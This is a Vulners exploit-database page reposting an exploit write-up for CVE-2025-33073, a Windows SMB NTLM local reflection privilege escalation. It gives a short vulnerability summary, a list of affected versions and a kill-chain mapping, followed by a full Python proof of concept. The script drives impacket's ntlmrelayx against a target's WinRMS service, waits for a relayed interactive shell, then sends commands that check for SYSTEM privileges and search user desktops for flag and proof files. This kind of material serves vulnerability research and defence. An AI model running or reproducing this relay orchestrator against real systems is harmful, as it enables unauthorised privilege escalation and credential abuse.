Vulners
Lucene search
📄 Microsoft Windows 11 SMB Local Privilege Escalation
| Reporter | Title | Published | Views | Family All 75 |
|---|---|---|---|---|
 | Exploit for Improper Access Control in Microsoft | 13 Jun 202512:15 | – | githubexploit |
| Exploit for Improper Access Control in Microsoft | 10 Dec 202503:46 | – | githubexploit |
 | July “In the Trend of VM” (#17): vulnerabilities in Microsoft Windows and Roundcube | 21 Jul 202516:30 | – | avleonov |
| About Elevation of Privilege – Windows SMB Client (CVE-2025-33073) vulnerability | 13 Jul 202512:26 | – | avleonov |
| June Microsoft Patch Tuesday | 10 Jun 202521:49 | – | avleonov |
 | CVE-2025-33073 | 10 Jun 202513:15 | – | circl |
 | Microsoft Windows SMB Client Improper Access Control Vulnerability | 20 Oct 202500:00 | – | cisa_kev |
 | CISA Adds Five Known Exploited Vulnerabilities to Catalog | 20 Oct 202512:00 | – | cisa |
 | Microsoft Windows SMB Server 访问控制错误漏洞 | 10 Jun 202500:00 | – | cnnvd |
 | CVE-2025-33073 | 10 Jun 202517:02 | – | cve |
10
=============================================================================================================================================
| # Title : Windows 11 V 24H2 SMB Local Privilege Escalation via NTLM Local Reflection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : System built‑in component. No standalone download available. |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/214224/ & CVE-2025-33073
[+] Summary : CVE‑2025‑33073 is a Microsoft Windows SMB privilege escalation vulnerability that abuses local NTLM reflection behavior within the SMB stack.
The vulnerability does not enable remote exploitation by itself, but it breaks key security assumptions in post‑compromise scenarios, especially those involving NTLM authentication and SMB Signing.
In affected Windows versions, an attacker who already has local code execution or an authenticated foothold can trigger SMB local loopback authentication in a way that allows NTLM credentials
to be reflected back to the same host, potentially resulting in elevated privileges (up to SYSTEM).
This vulnerability is particularly dangerous because it can invalidate the protection normally provided by SMB Signing,
but only in a local context, making it highly relevant for post‑exploitation, lateral movement preparation, and privilege escalation chains.
[+] Windows Versions Impacted by CVE‑2025‑33073
The vulnerability affects several client and server editions of Windows that were unpatched prior to Microsoft’s June2025 security update.
Windows 10 Versions (before_patch):
Windows 10 Version 1507
Windows 10 Version 1607
Windows 10 Version 1809
Windows 10 Version 21H2
Windows 10 Version 22H2
[+] All with builds earlier than their respective patched builds listed by Microsoft.
Windows 11 Versions (before_patch):
Windows 11 Version 22H2
Windows 11 Version 23H2
Windows 11 Version 24H2
[+] Affected until the patched builds released in mid‑2025.
Windows Server Editions (before_patch):
Windows Server 2008 (SP2 & R2 SP1)
Windows Server 2012 & 2012 R2
Windows Server 2016
Windows Server 2019
Windows Server 2022 (multiple branch builds)
Windows Server 2025 (24H2)
[+] All with builds lower than those patched by Microsoft in June2025.
[+] Vulnerability Type: Privilege Escalation
[+] Component: Microsoft Windows SMB
[+] Attack Vector: Local / Same‑host
[+] Authentication Required: Yes (local context)
[+] Remote Exploitation : No
[+] Post‑Exploitation Impact: High
[+] Role in a Professional Kill Chain :
CVE‑2025‑33073 fits after initial access, not as an entry point:
[+] Initial Access :
Phishing, credential theft, NTLM relay, or local code execution
[+] Execution :
Attacker gains user‑level shell or service execution
[+] Privilege Escalation :
CVE‑2025‑33073 leveraged
NTLM Local Reflection enables elevation (SYSTEM context)
[+] Credential Access :
High‑privilege tokens and credentials become accessible
[+] Lateral Movement :
Elevated access enables broader network compromise
[+] Persistence / Impact :
Durable control of the system or domain resources
The vulnerability amplifies existing access rather than creating it.
[+] MITRE ATT&CK Mapping :
- Primary Techniques
TA0004 – Privilege Escalation
T1068 – Exploitation for Privilege Escalation
- Secondary / Contextual Techniques
TA0006 – Credential Access
T1557 – Adversary‑in‑the‑Middle (Local / Loopback Context)
TA0008 – Lateral Movement (indirectly enabled)
[+] Relationship to NTLM Relay :
Aspect Relation
Classic NTLM Relay (Network) No
SMB Signing Bypass (Remote) No
NTLM Local Reflection Yes
Post‑Auth Privilege Escalation Yes
[+] Key Insight:
CVE‑2025‑33073 does not create NTLM Relay attacks, but it allows NTLM‑based protections to be bypassed locally, even when SMB Signing is enabled.
[+] Security Impact :
Undermines trust in SMB Signing within local contexts
Enables SYSTEM‑level privilege escalation
Increases blast radius of otherwise “contained” compromises
[+] Especially dangerous in:
Red‑team post‑exploitation
Breach escalation scenarios
Incident response underestimation cases
[+] Final Assessment :
CVE‑2025‑33073 is a force‑multiplier vulnerability.
On its own, it is not an entry vector—but in the hands of an attacker with limited access, it can turn a foothold into full system compromise, making it a critical post‑exploitation risk in modern Windows environments.
[+] Usage : python poc.py
[+] POC :
import os
import sys
import subprocess
import socket
import re
import logging
import signal
import time
import threading
from datetime import datetime
from queue import Queue, Empty
logger = logging.getLogger("Orchestrator")
if not logger.handlers:
logger.setLevel(logging.INFO)
class SafeFormatter(logging.Formatter):
def format(self, record):
msg = super().format(record)
return re.sub(r'\x1b\[[0-9;]*m', '', "".join(ch for ch in msg if ch.isprintable() or ch in "\n\r\t"))
fh = logging.FileHandler(f"relay_orchestrator_{datetime.now().strftime('%m%d_%H%M%S')}.log")
fh.setFormatter(SafeFormatter('%(asctime)s [%(levelname)s] %(message)s'))
logger.addHandler(fh)
ch = logging.StreamHandler(); ch.setFormatter(logging.Formatter('%(message)s')); logger.addHandler(ch)
def log_info(msg): logger.info(f"\033[0;34m[*] {msg}\033[0m")
def log_success(msg): logger.info(f"\033[0;32m[+] {msg}\033[0m")
def log_err(msg): logger.error(f"\033[0;31m[x] {msg}\033[0m")
def check_smb_signing_native(target_ip):
log_info(f"Checking SMB Signing (Native): {target_ip}...")
try:
from impacket.smbconnection import SMBConnection
# Attempt connection to extract signing status
smb = SMBConnection("*", target_ip, sess_port=445, timeout=5)
is_required = smb.isSigningRequired()
smb.logoff()
return is_required
except Exception as e:
log_err(f"SMB Check failed (Port closed or host unreachable): {e}")
return None
def post_exploit_analysis(port):
ps_payload = (
"$sid = whoami /groups;"
"if ($sid -match 'S-1-5-18') { 'STATUS: HIGH INTEGRITY (SYSTEM)' } else { 'STATUS: MEDIUM/LOW PRIVILEGE' };"
"Get-ChildItem -Path 'C:\\Users\\*\\Desktop\\*' -Include '*flag*','proof.txt' -File -ErrorAction SilentlyContinue | % { $_.FullName }"
)
cmds = f"whoami & hostname\npowershell -NoProfile -ExecutionPolicy Bypass -Command \"{ps_payload}\"\nexit\n"
try:
with socket.create_connection(("127.0.0.1", int(port)), timeout=10) as s:
s.sendall(cmds.encode('utf-8'))
s.settimeout(3)
buffer = b""
try:
while True:
chunk = s.recv(8192)
if not chunk: break
buffer += chunk
except socket.timeout: pass
try:
decoded = buffer.decode('utf-16le') if b'\x00' in buffer else buffer.decode('utf-8')
except UnicodeDecodeError:
decoded = buffer.decode('utf-8', errors='ignore')
log_success(f"Session Analysis Results:\n{decoded.strip()}")
except Exception as e:
log_err(f"Failed to interact with session on port {port}: {e}")
def cleanup_process(proc):
"""Ensures clean termination of the process tree in Windows and Unix."""
log_info("Cleaning up active processes...")
try:
if os.name == 'nt':
subprocess.run(['taskkill', '/F', '/T', '/PID', str(proc.pid)], capture_output=True)
else:
os.killpg(os.getpgid(proc.pid), signal.SIGTERM)
proc.wait(timeout=5)
except Exception:
proc.kill()
def run_orchestrator(target_ip):
port_regex = re.compile(r"Started interactive shell on (?:127\.0\.0\.1|0\.0\.0\.0):(\d+)", re.I)
relay_cmd = [sys.executable, "-m", "impacket.examples.ntlmrelayx",
"-smb2support", "-t", f"winrms://{target_ip}", "-i"]
kwargs = {'creationflags': subprocess.CREATE_NEW_PROCESS_GROUP} if os.name == 'nt' else {'preexec_fn': os.setsid}
try:
proc = subprocess.Popen(relay_cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True, bufsize=1, **kwargs)
q = Queue()
def enqueue_output(out, queue):
try:
for line in iter(out.readline, ''):
queue.put(line)
except Exception: pass
finally: out.close()
t = threading.Thread(target=enqueue_output, args=(proc.stdout, q))
t.daemon = True
t.start()
log_info(f"Orchestrator active.. waiting for forced NTLM auth for {target_ip}")
start_time = time.time()
while time.time() - start_time < 600:
try:
line = q.get_nowait()
if any(x in line for x in ["Relaying", "Authenticating", "127.0.0.1"]):
print(f"\033[0;34m[RELAY]\033[0m {line.strip()}")
match = port_regex.search(line)
if match:
found_port = match.group(1)
log_success(f"Active session detected! Allocated Port: {found_port}")
post_exploit_analysis(found_port)
break
except Empty:
time.sleep(0.1)
if proc.poll() is not None: break
cleanup_process(proc)
t.join(timeout=1)
except Exception as e:
log_err(f"Orchestrator management error: {e}")
def main():
try:
# Check for Impacket dependency
import impacket
print("\033[0;36m--- NTLM Relay Orchestrator (English Edition) ---\033[0m")
target_ip = input("[>] Target IP: ").strip()
if not re.match(r"^\d{1,3}(\.\d{1,3}){3}$", target_ip):
log_err("Invalid IP format.")
return
signing_req = check_smb_signing_native(target_ip)
if signing_req is True:
log_err("SMB Signing is REQUIRED; Relay will likely fail (unless CVE-2025-33073 Local Reflection occurs).")
if input("[!] Do you want to proceed anyway? (y/n): ").lower() != 'y': return
elif signing_req is False:
log_success("SMB Signing is NOT REQUIRED. Target is vulnerable to Relay.")
run_orchestrator(target_ip)
except KeyboardInterrupt:
print("\n[*] Script aborted by user.")
sys.exit(0)
except ImportError:
log_err("Impacket library missing. Install it via: pip install impacket")
if __name__ == "__main__":
main()
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Mar 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.18.8
EPSS0.37158
SSVC